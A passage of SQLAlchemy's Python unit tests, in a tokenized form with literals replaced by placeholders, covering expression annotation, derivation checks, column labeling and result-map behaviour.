'<STR_LIT>' , meta , Column ( '<STR_LIT>' , Integer , primary_key = True ) , <EOL> Column ( '<STR_LIT>' , String ( <NUM_LIT:30> ) ) ) <EOL> t2 = Table ( '<STR_LIT>' , meta , Column ( '<STR_LIT>' , Integer , primary_key = True ) , <EOL> Column ( '<STR_LIT>' , String ( <NUM_LIT:30> ) ) ) <EOL> assert t1 . is_derived_from ( t1 ) <EOL> assert not t2 . 
is_derived_from ( t1 ) <EOL> def test_alias ( self ) : <EOL> meta = MetaData ( ) <EOL> t1 = Table ( '<STR_LIT>' , meta , Column ( '<STR_LIT>' , Integer , primary_key = True ) , <EOL> Column ( '<STR_LIT>' , String ( <NUM_LIT:30> ) ) ) <EOL> t2 = Table ( '<STR_LIT>' , meta , Column ( '<STR_LIT>' , Integer , primary_key = True ) , <EOL> Column ( '<STR_LIT>' , String ( <NUM_LIT:30> ) ) ) <EOL> assert t1 . alias ( ) . is_derived_from ( t1 ) <EOL> assert not t2 . alias ( ) . is_derived_from ( t1 ) <EOL> assert not t1 . is_derived_from ( t1 . alias ( ) ) <EOL> assert not t1 . is_derived_from ( t2 . alias ( ) ) <EOL> def test_select ( self ) : <EOL> meta = MetaData ( ) <EOL> t1 = Table ( '<STR_LIT>' , meta , Column ( '<STR_LIT>' , Integer , primary_key = True ) , <EOL> Column ( '<STR_LIT>' , String ( <NUM_LIT:30> ) ) ) <EOL> t2 = Table ( '<STR_LIT>' , meta , Column ( '<STR_LIT>' , Integer , primary_key = True ) , <EOL> Column ( '<STR_LIT>' , String ( <NUM_LIT:30> ) ) ) <EOL> assert t1 . select ( ) . is_derived_from ( t1 ) <EOL> assert not t2 . select ( ) . is_derived_from ( t1 ) <EOL> assert select ( [ t1 , t2 ] ) . is_derived_from ( t1 ) <EOL> assert t1 . select ( ) . alias ( '<STR_LIT:foo>' ) . is_derived_from ( t1 ) <EOL> assert select ( [ t1 , t2 ] ) . alias ( '<STR_LIT:foo>' ) . is_derived_from ( t1 ) <EOL> assert not t2 . select ( ) . alias ( '<STR_LIT:foo>' ) . is_derived_from ( t1 ) <EOL> class AnnotationsTest ( fixtures . TestBase ) : <EOL> def test_hashing ( self ) : <EOL> t = table ( '<STR_LIT:t>' , column ( '<STR_LIT:x>' ) ) <EOL> a = t . alias ( ) <EOL> s = t . select ( ) <EOL> s2 = a . select ( ) <EOL> for obj in [ <EOL> t , <EOL> t . c . x , <EOL> a , <EOL> s , <EOL> s2 , <EOL> t . c . x > <NUM_LIT:1> , <EOL> ( t . c . x > <NUM_LIT:1> ) . label ( None ) <EOL> ] : <EOL> annot = obj . 
_annotate ( { } ) <EOL> eq_ ( set ( [ obj ] ) , set ( [ annot ] ) ) <EOL> def test_compare ( self ) : <EOL> t = table ( '<STR_LIT:t>' , column ( '<STR_LIT:x>' ) , column ( '<STR_LIT:y>' ) ) <EOL> x_a = t . c . x . _annotate ( { } ) <EOL> assert t . c . x . compare ( x_a ) <EOL> assert x_a . compare ( t . c . x ) <EOL> assert not x_a . compare ( t . c . y ) <EOL> assert not t . c . y . compare ( x_a ) <EOL> assert ( t . c . x == <NUM_LIT:5> ) . compare ( x_a == <NUM_LIT:5> ) <EOL> assert not ( t . c . y == <NUM_LIT:5> ) . compare ( x_a == <NUM_LIT:5> ) <EOL> s = select ( [ t ] ) <EOL> x_p = s . c . x <EOL> assert not x_a . compare ( x_p ) <EOL> assert not t . c . x . compare ( x_p ) <EOL> x_p_a = x_p . _annotate ( { } ) <EOL> assert x_p_a . compare ( x_p ) <EOL> assert x_p . compare ( x_p_a ) <EOL> assert not x_p_a . compare ( x_a ) <EOL> def test_late_name_add ( self ) : <EOL> from sqlalchemy . schema import Column <EOL> c1 = Column ( Integer ) <EOL> c1_a = c1 . _annotate ( { "<STR_LIT:foo>" : "<STR_LIT:bar>" } ) <EOL> c1 . name = '<STR_LIT>' <EOL> eq_ ( c1_a . name , '<STR_LIT>' ) <EOL> def test_late_table_add ( self ) : <EOL> c1 = Column ( "<STR_LIT:foo>" , Integer ) <EOL> c1_a = c1 . _annotate ( { "<STR_LIT:foo>" : "<STR_LIT:bar>" } ) <EOL> t = Table ( '<STR_LIT:t>' , MetaData ( ) , c1 ) <EOL> is_ ( c1_a . table , t ) <EOL> def test_basic_attrs ( self ) : <EOL> t = Table ( '<STR_LIT:t>' , MetaData ( ) , <EOL> Column ( '<STR_LIT:x>' , Integer , info = { '<STR_LIT:q>' : '<STR_LIT:p>' } ) , <EOL> Column ( '<STR_LIT:y>' , Integer , key = '<STR_LIT:q>' ) ) <EOL> x_a = t . c . x . _annotate ( { } ) <EOL> y_a = t . c . q . _annotate ( { } ) <EOL> t . c . x . info [ '<STR_LIT:z>' ] = '<STR_LIT:h>' <EOL> eq_ ( y_a . key , '<STR_LIT:q>' ) <EOL> is_ ( x_a . table , t ) <EOL> eq_ ( x_a . info , { '<STR_LIT:q>' : '<STR_LIT:p>' , '<STR_LIT:z>' : '<STR_LIT:h>' } ) <EOL> eq_ ( t . c . x . anon_label , x_a . 
anon_label ) <EOL> def test_custom_constructions ( self ) : <EOL> from sqlalchemy . schema import Column <EOL> class MyColumn ( Column ) : <EOL> def __init__ ( self ) : <EOL> Column . __init__ ( self , '<STR_LIT:foo>' , Integer ) <EOL> _constructor = Column <EOL> t1 = Table ( '<STR_LIT>' , MetaData ( ) , MyColumn ( ) ) <EOL> s1 = t1 . select ( ) <EOL> assert isinstance ( t1 . c . foo , MyColumn ) <EOL> assert isinstance ( s1 . c . foo , Column ) <EOL> annot_1 = t1 . c . foo . _annotate ( { } ) <EOL> s2 = select ( [ annot_1 ] ) <EOL> assert isinstance ( s2 . c . foo , Column ) <EOL> annot_2 = s1 . _annotate ( { } ) <EOL> assert isinstance ( annot_2 . c . foo , Column ) <EOL> def test_custom_construction_correct_anno_subclass ( self ) : <EOL> from sqlalchemy . schema import Column <EOL> from sqlalchemy . sql . elements import AnnotatedColumnElement <EOL> class MyColumn ( Column ) : <EOL> pass <EOL> assert isinstance ( <EOL> MyColumn ( '<STR_LIT:x>' , Integer ) . _annotate ( { "<STR_LIT:foo>" : "<STR_LIT:bar>" } ) , <EOL> AnnotatedColumnElement ) <EOL> def test_custom_construction_correct_anno_expr ( self ) : <EOL> from sqlalchemy . schema import Column <EOL> class MyColumn ( Column ) : <EOL> pass <EOL> col = MyColumn ( '<STR_LIT:x>' , Integer ) <EOL> binary_1 = col == <NUM_LIT:5> <EOL> col_anno = MyColumn ( '<STR_LIT:x>' , Integer ) . _annotate ( { "<STR_LIT:foo>" : "<STR_LIT:bar>" } ) <EOL> binary_2 = col_anno == <NUM_LIT:5> <EOL> eq_ ( binary_2 . left . _annotations , { "<STR_LIT:foo>" : "<STR_LIT:bar>" } ) <EOL> def test_annotated_corresponding_column ( self ) : <EOL> table1 = table ( '<STR_LIT>' , column ( "<STR_LIT>" ) ) <EOL> s1 = select ( [ table1 . c . col1 ] ) <EOL> t1 = s1 . _annotate ( { } ) <EOL> t2 = s1 <EOL> assert t1 . c is t2 . c <EOL> assert t1 . c . col1 is t2 . c . col1 <EOL> inner = select ( [ s1 ] ) <EOL> assert inner . corresponding_column ( <EOL> t2 . c . col1 , <EOL> require_embedded = False ) is inner . corresponding_column ( <EOL> t2 . c . 
col1 , <EOL> require_embedded = True ) is inner . c . col1 <EOL> assert inner . corresponding_column ( <EOL> t1 . c . col1 , <EOL> require_embedded = False ) is inner . corresponding_column ( <EOL> t1 . c . col1 , <EOL> require_embedded = True ) is inner . c . col1 <EOL> def test_annotated_visit ( self ) : <EOL> table1 = table ( '<STR_LIT>' , column ( "<STR_LIT>" ) , column ( "<STR_LIT>" ) ) <EOL> bin = table1 . c . col1 == bindparam ( '<STR_LIT:foo>' , value = None ) <EOL> assert str ( bin ) == "<STR_LIT>" <EOL> def visit_binary ( b ) : <EOL> b . right = table1 . c . col2 <EOL> b2 = visitors . cloned_traverse ( bin , { } , { '<STR_LIT>' : visit_binary } ) <EOL> assert str ( b2 ) == "<STR_LIT>" <EOL> b3 = visitors . cloned_traverse ( bin . _annotate ( { } ) , { } , { '<STR_LIT>' : <EOL> visit_binary } ) <EOL> assert str ( b3 ) == '<STR_LIT>' <EOL> def visit_binary ( b ) : <EOL> b . left = bindparam ( '<STR_LIT:bar>' ) <EOL> b4 = visitors . cloned_traverse ( b2 , { } , { '<STR_LIT>' : visit_binary } ) <EOL> assert str ( b4 ) == "<STR_LIT>" <EOL> b5 = visitors . cloned_traverse ( b3 , { } , { '<STR_LIT>' : visit_binary } ) <EOL> assert str ( b5 ) == "<STR_LIT>" <EOL> def test_label_accessors ( self ) : <EOL> t1 = table ( '<STR_LIT>' , column ( '<STR_LIT>' ) ) <EOL> l1 = t1 . c . c1 . label ( None ) <EOL> is_ ( l1 . _order_by_label_element , l1 ) <EOL> l1a = l1 . _annotate ( { "<STR_LIT:foo>" : "<STR_LIT:bar>" } ) <EOL> is_ ( l1a . _order_by_label_element , l1a ) <EOL> def test_annotate_aliased ( self ) : <EOL> t1 = table ( '<STR_LIT>' , column ( '<STR_LIT>' ) ) <EOL> s = select ( [ ( t1 . c . c1 + <NUM_LIT:3> ) . label ( '<STR_LIT>' ) ] ) <EOL> a = s . alias ( ) <EOL> a = sql_util . _deep_annotate ( a , { '<STR_LIT:foo>' : '<STR_LIT:bar>' } ) <EOL> eq_ ( a . _annotations [ '<STR_LIT:foo>' ] , '<STR_LIT:bar>' ) <EOL> eq_ ( a . element . 
_annotations [ '<STR_LIT:foo>' ] , '<STR_LIT:bar>' ) <EOL> def test_annotate_expressions ( self ) : <EOL> table1 = table ( '<STR_LIT>' , column ( '<STR_LIT>' ) , column ( '<STR_LIT>' ) ) <EOL> for expr , expected in [ ( table1 . c . col1 , '<STR_LIT>' ) , <EOL> ( table1 . c . col1 == <NUM_LIT:5> , <EOL> '<STR_LIT>' ) , <EOL> ( table1 . c . col1 . in_ ( [ <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> ] ) , <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) ] : <EOL> eq_ ( str ( expr ) , expected ) <EOL> eq_ ( str ( expr . _annotate ( { } ) ) , expected ) <EOL> eq_ ( str ( sql_util . _deep_annotate ( expr , { } ) ) , expected ) <EOL> eq_ ( str ( sql_util . _deep_annotate ( <EOL> expr , { } , exclude = [ table1 . c . col1 ] ) ) , expected ) <EOL> def test_deannotate ( self ) : <EOL> table1 = table ( '<STR_LIT>' , column ( "<STR_LIT>" ) , column ( "<STR_LIT>" ) ) <EOL> bin = table1 . c . col1 == bindparam ( '<STR_LIT:foo>' , value = None ) <EOL> b2 = sql_util . _deep_annotate ( bin , { '<STR_LIT>' : True } ) <EOL> b3 = sql_util . _deep_deannotate ( b2 ) <EOL> b4 = sql_util . _deep_deannotate ( bin ) <EOL> for elem in ( b2 . _annotations , b2 . left . _annotations ) : <EOL> assert '<STR_LIT>' in elem <EOL> for elem in b3 . _annotations , b3 . left . _annotations , b4 . _annotations , b4 . left . _annotations : <EOL> assert elem == { } <EOL> assert b2 . left is not bin . left <EOL> assert b3 . left is not b2 . left is not bin . left <EOL> assert b4 . left is bin . left <EOL> assert bin . right is not b2 . right is not b3 . right is not b4 . right <EOL> def test_annotate_unique_traversal ( self ) : <EOL> """<STR_LIT>""" <EOL> table1 = table ( '<STR_LIT>' , column ( '<STR_LIT:x>' ) ) <EOL> table2 = table ( '<STR_LIT>' , column ( '<STR_LIT:y>' ) ) <EOL> a1 = table1 . alias ( ) <EOL> s = select ( [ a1 . c . x ] ) . select_from ( <EOL> a1 . join ( table2 , a1 . c . x == table2 . c . y ) <EOL> ) <EOL> for sel in ( <EOL> sql_util . _deep_deannotate ( s ) , <EOL> visitors . 
cloned_traverse ( s , { } , { } ) , <EOL> visitors . replacement_traverse ( s , { } , lambda x : None ) <EOL> ) : <EOL> assert sel . _raw_columns [ <NUM_LIT:0> ] . table is a1 <EOL> assert sel . _froms [ <NUM_LIT:0> ] is sel . _froms [ <NUM_LIT:1> ] . left <EOL> eq_ ( str ( s ) , str ( sel ) ) <EOL> for sel in ( <EOL> sql_util . _deep_deannotate ( s , { "<STR_LIT:foo>" : "<STR_LIT:bar>" } ) , <EOL> sql_util . _deep_annotate ( s , { '<STR_LIT:foo>' : '<STR_LIT:bar>' } ) , <EOL> ) : <EOL> assert sel . _froms [ <NUM_LIT:0> ] is not sel . _froms [ <NUM_LIT:1> ] . left <EOL> eq_ ( str ( s ) , str ( sel ) ) <EOL> def test_annotate_varied_annot_same_col ( self ) : <EOL> """<STR_LIT>""" <EOL> t1 = table ( '<STR_LIT>' , column ( "<STR_LIT>" ) , column ( "<STR_LIT>" ) ) <EOL> s = select ( [ t1 . c . col1 . _annotate ( { "<STR_LIT:foo>" : "<STR_LIT:bar>" } ) ] ) <EOL> s2 = select ( [ t1 . c . col1 . _annotate ( { "<STR_LIT>" : "<STR_LIT>" } ) ] ) <EOL> s3 = s . union ( s2 ) <EOL> sel = sql_util . _deep_annotate ( s3 , { "<STR_LIT>" : "<STR_LIT>" } ) <EOL> eq_ ( <EOL> sel . selects [ <NUM_LIT:0> ] . _raw_columns [ <NUM_LIT:0> ] . _annotations , <EOL> { "<STR_LIT:foo>" : "<STR_LIT:bar>" , "<STR_LIT>" : "<STR_LIT>" } <EOL> ) <EOL> eq_ ( <EOL> sel . selects [ <NUM_LIT:1> ] . _raw_columns [ <NUM_LIT:0> ] . _annotations , <EOL> { "<STR_LIT>" : "<STR_LIT>" , "<STR_LIT>" : "<STR_LIT>" } <EOL> ) <EOL> def test_deannotate_2 ( self ) : <EOL> table1 = table ( '<STR_LIT>' , column ( "<STR_LIT>" ) , column ( "<STR_LIT>" ) ) <EOL> j = table1 . c . col1 . _annotate ( { "<STR_LIT>" : True } ) == table1 . c . col2 . _annotate ( { "<STR_LIT>" : True } ) <EOL> j2 = sql_util . _deep_deannotate ( j ) <EOL> eq_ ( <EOL> j . left . _annotations , { "<STR_LIT>" : True } <EOL> ) <EOL> eq_ ( <EOL> j2 . left . 
_annotations , { } <EOL> ) <EOL> def test_deannotate_3 ( self ) : <EOL> table1 = table ( '<STR_LIT>' , column ( "<STR_LIT>" ) , column ( "<STR_LIT>" ) , <EOL> column ( "<STR_LIT>" ) , column ( "<STR_LIT>" ) ) <EOL> j = and_ ( <EOL> table1 . c . col1 . _annotate ( { "<STR_LIT>" : True } ) == <EOL> table1 . c . col2 . _annotate ( { "<STR_LIT>" : True } ) , <EOL> table1 . c . col3 . _annotate ( { "<STR_LIT>" : True } ) == <EOL> table1 . c . col4 . _annotate ( { "<STR_LIT>" : True } ) <EOL> ) <EOL> j2 = sql_util . _deep_deannotate ( j ) <EOL> eq_ ( <EOL> j . clauses [ <NUM_LIT:0> ] . left . _annotations , { "<STR_LIT>" : True } <EOL> ) <EOL> eq_ ( <EOL> j2 . clauses [ <NUM_LIT:0> ] . left . _annotations , { } <EOL> ) <EOL> def test_annotate_fromlist_preservation ( self ) : <EOL> """<STR_LIT>""" <EOL> table1 = table ( '<STR_LIT>' , column ( '<STR_LIT:x>' ) ) <EOL> table2 = table ( '<STR_LIT>' , column ( '<STR_LIT:y>' ) ) <EOL> a1 = table1 . alias ( ) <EOL> s = select ( [ a1 . c . x ] ) . select_from ( <EOL> a1 . join ( table2 , a1 . c . x == table2 . c . y ) <EOL> ) <EOL> assert_s = select ( [ select ( [ s ] ) ] ) <EOL> for fn in ( <EOL> sql_util . _deep_deannotate , <EOL> lambda s : sql_util . _deep_annotate ( s , { '<STR_LIT:foo>' : '<STR_LIT:bar>' } ) , <EOL> lambda s : visitors . cloned_traverse ( s , { } , { } ) , <EOL> lambda s : visitors . replacement_traverse ( s , { } , lambda x : None ) <EOL> ) : <EOL> sel = fn ( select ( [ fn ( select ( [ fn ( s ) ] ) ) ] ) ) <EOL> eq_ ( str ( assert_s ) , str ( sel ) ) <EOL> def test_bind_unique_test ( self ) : <EOL> table ( '<STR_LIT:t>' , column ( '<STR_LIT:a>' ) , column ( '<STR_LIT:b>' ) ) <EOL> b = bindparam ( "<STR_LIT>" , value = "<STR_LIT:x>" , unique = True ) <EOL> eq_ ( str ( or_ ( b , b . _annotate ( { "<STR_LIT:foo>" : "<STR_LIT:bar>" } ) ) ) , <EOL> "<STR_LIT>" ) <EOL> def test_comparators_cleaned_out_construction ( self ) : <EOL> c = column ( '<STR_LIT:a>' ) <EOL> comp1 = c . comparator <EOL> c1 = c . 
_annotate ( { "<STR_LIT:foo>" : "<STR_LIT:bar>" } ) <EOL> comp2 = c1 . comparator <EOL> assert comp1 is not comp2 <EOL> def test_comparators_cleaned_out_reannotate ( self ) : <EOL> c = column ( '<STR_LIT:a>' ) <EOL> c1 = c . _annotate ( { "<STR_LIT:foo>" : "<STR_LIT:bar>" } ) <EOL> comp1 = c1 . comparator <EOL> c2 = c1 . _annotate ( { "<STR_LIT>" : "<STR_LIT>" } ) <EOL> comp2 = c2 . comparator <EOL> assert comp1 is not comp2 <EOL> def test_comparator_cleanout_integration ( self ) : <EOL> c = column ( '<STR_LIT:a>' ) <EOL> c1 = c . _annotate ( { "<STR_LIT:foo>" : "<STR_LIT:bar>" } ) <EOL> comp1 = c1 . comparator <EOL> c2 = c1 . _annotate ( { "<STR_LIT>" : "<STR_LIT>" } ) <EOL> comp2 = c2 . comparator <EOL> assert ( c2 == <NUM_LIT:5> ) . left . _annotations == { "<STR_LIT:foo>" : "<STR_LIT:bar>" , "<STR_LIT>" : "<STR_LIT>" } <EOL> class ReprTest ( fixtures . TestBase ) : <EOL> def test_ensure_repr_elements ( self ) : <EOL> for obj in [ <EOL> elements . Cast ( <NUM_LIT:1> , <NUM_LIT:2> ) , <EOL> elements . TypeClause ( String ( ) ) , <EOL> elements . ColumnClause ( '<STR_LIT:x>' ) , <EOL> elements . BindParameter ( '<STR_LIT:q>' ) , <EOL> elements . Null ( ) , <EOL> elements . True_ ( ) , <EOL> elements . False_ ( ) , <EOL> elements . ClauseList ( ) , <EOL> elements . BooleanClauseList . and_ ( ) , <EOL> elements . Tuple ( ) , <EOL> elements . Case ( [ ] ) , <EOL> elements . Extract ( '<STR_LIT:foo>' , column ( '<STR_LIT:x>' ) ) , <EOL> elements . UnaryExpression ( column ( '<STR_LIT:x>' ) ) , <EOL> elements . Grouping ( column ( '<STR_LIT:x>' ) ) , <EOL> elements . Over ( func . foo ( ) ) , <EOL> elements . Label ( '<STR_LIT:q>' , column ( '<STR_LIT:x>' ) ) , <EOL> ] : <EOL> repr ( obj ) <EOL> class WithLabelsTest ( fixtures . TestBase ) : <EOL> def _assert_labels_warning ( self , s ) : <EOL> assert_raises_message ( <EOL> exc . SAWarning , <EOL> r"<STR_LIT>" , <EOL> lambda : s . c <EOL> ) <EOL> def _assert_result_keys ( self , s , keys ) : <EOL> compiled = s . 
compile ( ) <EOL> eq_ ( set ( compiled . _create_result_map ( ) ) , set ( keys ) ) <EOL> def _assert_subq_result_keys ( self , s , keys ) : <EOL> compiled = s . select ( ) . compile ( ) <EOL> eq_ ( set ( compiled . _create_result_map ( ) ) , set ( keys ) ) <EOL> def _names_overlap ( self ) : <EOL> m = MetaData ( ) <EOL> t1 = Table ( '<STR_LIT>' , m , Column ( '<STR_LIT:x>' , Integer ) ) <EOL> t2 = Table ( '<STR_LIT>' , m , Column ( '<STR_LIT:x>' , Integer ) ) <EOL> return select ( [ t1 , t2 ] ) <EOL> def test_names_overlap_nolabel ( self ) : <EOL> sel = self . _names_overlap ( ) <EOL> self . _assert_labels_warning ( sel ) <EOL> self . _assert_result_keys ( sel , [ '<STR_LIT:x>' ] ) <EOL> def test_names_overlap_label ( self ) : <EOL> sel = self . _names_overlap ( ) . apply_labels ( ) <EOL> eq_ ( <EOL> list ( sel . c . keys ( ) ) , <EOL> [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> ) <EOL> self . _assert_result_keys ( sel , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> def _names_overlap_keys_dont ( self ) : <EOL> m = MetaData ( ) <EOL> t1 = Table ( '<STR_LIT>' , m , Column ( '<STR_LIT:x>' , Integer , key = '<STR_LIT:a>' ) ) <EOL> t2 = Table ( '<STR_LIT>' , m , Column ( '<STR_LIT:x>' , Integer , key = '<STR_LIT:b>' ) ) <EOL> return select ( [ t1 , t2 ] ) <EOL> def test_names_overlap_keys_dont_nolabel ( self ) : <EOL> sel = self . _names_overlap_keys_dont ( ) <EOL> eq_ ( <EOL> list ( sel . c . keys ( ) ) , <EOL> [ '<STR_LIT:a>' , '<STR_LIT:b>' ] <EOL> ) <EOL> self . _assert_result_keys ( sel , [ '<STR_LIT:x>' ] ) <EOL> def test_names_overlap_keys_dont_label ( self ) : <EOL> sel = self . _names_overlap_keys_dont ( ) . apply_labels ( ) <EOL> eq_ ( <EOL> list ( sel . c . keys ( ) ) , <EOL> [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> ) <EOL> self . 
_assert_result_keys ( sel , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> def _labels_overlap ( self ) : <EOL> m = MetaData ( ) <EOL> t1 = Table ( '<STR_LIT:t>' , m , Column ( '<STR_LIT>' , Integer ) ) <EOL> t2 = Table ( '<STR_LIT>' , m , Column ( '<STR_LIT:id>' , Integer ) ) <EOL> return select ( [ t1 , t2 ] ) <EOL> def test_labels_overlap_nolabel ( self ) : <EOL> sel = self . _labels_overlap ( ) <EOL> eq_ ( <EOL> list ( sel . c . keys ( ) ) , <EOL> [ '<STR_LIT>' , '<STR_LIT:id>' ] <EOL> ) <EOL> self . _assert_result_keys ( sel , [ '<STR_LIT>' , '<STR_LIT:id>' ] ) <EOL> def test_labels_overlap_label ( self ) : <EOL> sel = self . _labels_overlap ( ) . apply_labels ( ) <EOL> t2 = sel . froms [ <NUM_LIT:1> ] <EOL> eq_ ( <EOL> list ( sel . c . keys ( ) ) , <EOL> [ '<STR_LIT>' , t2 . c . id . anon_label ] <EOL> ) <EOL> self . _assert_result_keys ( sel , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> self . _assert_subq_result_keys ( sel , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> def _labels_overlap_keylabels_dont ( self ) : <EOL> m = MetaData ( ) <EOL> t1 = Table ( '<STR_LIT:t>' , m , Column ( '<STR_LIT>' , Integer , key = '<STR_LIT:a>' ) ) <EOL> t2 = Table ( '<STR_LIT>' , m , Column ( '<STR_LIT:id>' , Integer , key = '<STR_LIT:b>' ) ) <EOL> return select ( [ t1 , t2 ] ) <EOL> def test_labels_overlap_keylabels_dont_nolabel ( self ) : <EOL> sel = self . _labels_overlap_keylabels_dont ( ) <EOL> eq_ ( list ( sel . c . keys ( ) ) , [ '<STR_LIT:a>' , '<STR_LIT:b>' ] ) <EOL> self . _assert_result_keys ( sel , [ '<STR_LIT>' , '<STR_LIT:id>' ] ) <EOL> def test_labels_overlap_keylabels_dont_label ( self ) : <EOL> sel = self . _labels_overlap_keylabels_dont ( ) . apply_labels ( ) <EOL> eq_ ( list ( sel . c . keys ( ) ) , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> self . 
_assert_result_keys ( sel , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> def _keylabels_overlap_labels_dont ( self ) : <EOL> m = MetaData ( ) <EOL> t1 = Table ( '<STR_LIT:t>' , m , Column ( '<STR_LIT:a>' , Integer , key = '<STR_LIT>' ) ) <EOL> t2 = Table ( '<STR_LIT>' , m , Column ( '<STR_LIT:b>' , Integer , key = '<STR_LIT:id>' ) ) <EOL> return select ( [ t1 , t2 ] ) <EOL> def test_keylabels_overlap_labels_dont_nolabel ( self ) : <EOL> sel = self . _keylabels_overlap_labels_dont ( ) <EOL> eq_ ( list ( sel . c . keys ( ) ) , [ '<STR_LIT>' , '<STR_LIT:id>' ] ) <EOL> self . _assert_result_keys ( sel , [ '<STR_LIT:a>' , '<STR_LIT:b>' ] ) <EOL> def test_keylabels_overlap_labels_dont_label ( self ) : <EOL> sel = self . _keylabels_overlap_labels_dont ( ) . apply_labels ( ) <EOL> t2 = sel . froms [ <NUM_LIT:1> ] <EOL> eq_ ( list ( sel . c . keys ( ) ) , [ '<STR_LIT>' , t2 . c . id . anon_label ] ) <EOL> self . _assert_result_keys ( sel , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> self . _assert_subq_result_keys ( sel , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> def _keylabels_overlap_labels_overlap ( self ) : <EOL> m = MetaData ( ) <EOL> t1 = Table ( '<STR_LIT:t>' , m , Column ( '<STR_LIT>' , Integer , key = '<STR_LIT>' ) ) <EOL> t2 = Table ( '<STR_LIT>' , m , Column ( '<STR_LIT:id>' , Integer , key = '<STR_LIT:a>' ) ) <EOL> return select ( [ t1 , t2 ] ) <EOL> def test_keylabels_overlap_labels_overlap_nolabel ( self ) : <EOL> sel = self . _keylabels_overlap_labels_overlap ( ) <EOL> eq_ ( list ( sel . c . keys ( ) ) , [ '<STR_LIT>' , '<STR_LIT:a>' ] ) <EOL> self . _assert_result_keys ( sel , [ '<STR_LIT>' , '<STR_LIT:id>' ] ) <EOL> self . _assert_subq_result_keys ( sel , [ '<STR_LIT>' , '<STR_LIT:id>' ] ) <EOL> def test_keylabels_overlap_labels_overlap_label ( self ) : <EOL> sel = self . _keylabels_overlap_labels_overlap ( ) . apply_labels ( ) <EOL> t2 = sel . froms [ <NUM_LIT:1> ] <EOL> eq_ ( list ( sel . c . keys ( ) ) , [ '<STR_LIT>' , t2 . c . a . anon_label ] ) <EOL> self . 
_assert_result_keys ( sel , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> self . _assert_subq_result_keys ( sel , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> def _keys_overlap_names_dont ( self ) : <EOL> m = MetaData ( ) <EOL> t1 = Table ( '<STR_LIT>' , m , Column ( '<STR_LIT:a>' , Integer , key = '<STR_LIT:x>' ) ) <EOL> t2 = Table ( '<STR_LIT>' , m , Column ( '<STR_LIT:b>' , Integer , key = '<STR_LIT:x>' ) ) <EOL> return select ( [ t1 , t2 ] ) <EOL> def test_keys_overlap_names_dont_nolabel ( self ) : <EOL> sel = self . _keys_overlap_names_dont ( ) <EOL> self . _assert_labels_warning ( sel ) <EOL> self . _assert_result_keys ( sel , [ '<STR_LIT:a>' , '<STR_LIT:b>' ] ) <EOL> def test_keys_overlap_names_dont_label ( self ) : <EOL> sel = self . _keys_overlap_names_dont ( ) . apply_labels ( ) <EOL> eq_ ( <EOL> list ( sel . c . keys ( ) ) , <EOL> [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> ) <EOL> self . _assert_result_keys ( sel , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> class ResultMapTest ( fixtures . TestBase ) : <EOL> def _fixture ( self ) : <EOL> m = MetaData ( ) <EOL> t = Table ( '<STR_LIT:t>' , m , Column ( '<STR_LIT:x>' , Integer ) , Column ( '<STR_LIT:y>' , Integer ) ) <EOL> return t <EOL> def _mapping ( self , stmt ) : <EOL> compiled = stmt . compile ( ) <EOL> return dict ( <EOL> ( elem , key ) <EOL> for key , elements in compiled . _create_result_map ( ) . items ( ) <EOL> for elem in elements [ <NUM_LIT:1> ] <EOL> ) <EOL> def test_select_label_alt_name ( self ) : <EOL> t = self . _fixture ( ) <EOL> l1 , l2 = t . c . x . label ( '<STR_LIT:a>' ) , t . c . y . label ( '<STR_LIT:b>' ) <EOL> s = select ( [ l1 , l2 ] ) <EOL> mapping = self . _mapping ( s ) <EOL> assert l1 in mapping <EOL> assert t . c . x not in mapping <EOL> def test_select_alias_label_alt_name ( self ) : <EOL> t = self . _fixture ( ) <EOL> l1 , l2 = t . c . x . label ( '<STR_LIT:a>' ) , t . c . y . label ( '<STR_LIT:b>' ) <EOL> s = select ( [ l1 , l2 ] ) . alias ( ) <EOL> mapping = self . 
_mapping ( s ) <EOL> assert l1 in mapping <EOL> assert t . c . x not in mapping <EOL> def test_select_alias_column ( self ) : <EOL> t = self . _fixture ( ) <EOL> x , y = t . c . x , t . c . y <EOL> s = select ( [ x , y ] ) . alias ( ) <EOL> mapping = self . _mapping ( s ) <EOL> assert t . c . x in mapping <EOL> def test_select_alias_column_apply_labels ( self ) : <EOL> t = self . _fixture ( ) <EOL> x , y = t . c . x , t . c . y <EOL> s = select ( [ x , y ] ) . apply_labels ( ) . alias ( ) <EOL> mapping = self . _mapping ( s ) <EOL> assert t . c . x in mapping <EOL> def test_select_table_alias_column ( self ) : <EOL> t = self . _fixture ( ) <EOL> x , y = t . c . x , t . c . y <EOL> ta = t . alias ( ) <EOL> s = select ( [ ta . c . x , ta . c . y ] ) <EOL> mapping = self . _mapping ( s ) <EOL> assert x not in mapping <EOL> def test_select_label_alt_name_table_alias_column ( self ) : <EOL> t = self . _fixture ( ) <EOL> x , y = t . c . x , t . c . y <EOL> ta = t . alias ( ) <EOL> l1 , l2 = ta . c . x . label ( '<STR_LIT:a>' ) , ta . c . y . label ( '<STR_LIT:b>' ) <EOL> s = select ( [ l1 , l2 ] ) <EOL> mapping = self . _mapping ( s ) <EOL> assert x not in mapping <EOL> assert l1 in mapping <EOL> assert ta . c . x not in mapping <EOL> def test_column_subquery_exists ( self ) : <EOL> t = self . _fixture ( ) <EOL> s = exists ( ) . where ( t . c . x == <NUM_LIT:5> ) . select ( ) <EOL> mapping = self . _mapping ( s ) <EOL> assert t . c . x not in mapping <EOL> eq_ ( <EOL> [ type ( entry [ - <NUM_LIT:1> ] ) for entry in s . compile ( ) . _result_columns ] , <EOL> [ Boolean ] <EOL> ) <EOL> def test_plain_exists ( self ) : <EOL> expr = exists ( [ <NUM_LIT:1> ] ) <EOL> eq_ ( type ( expr . type ) , 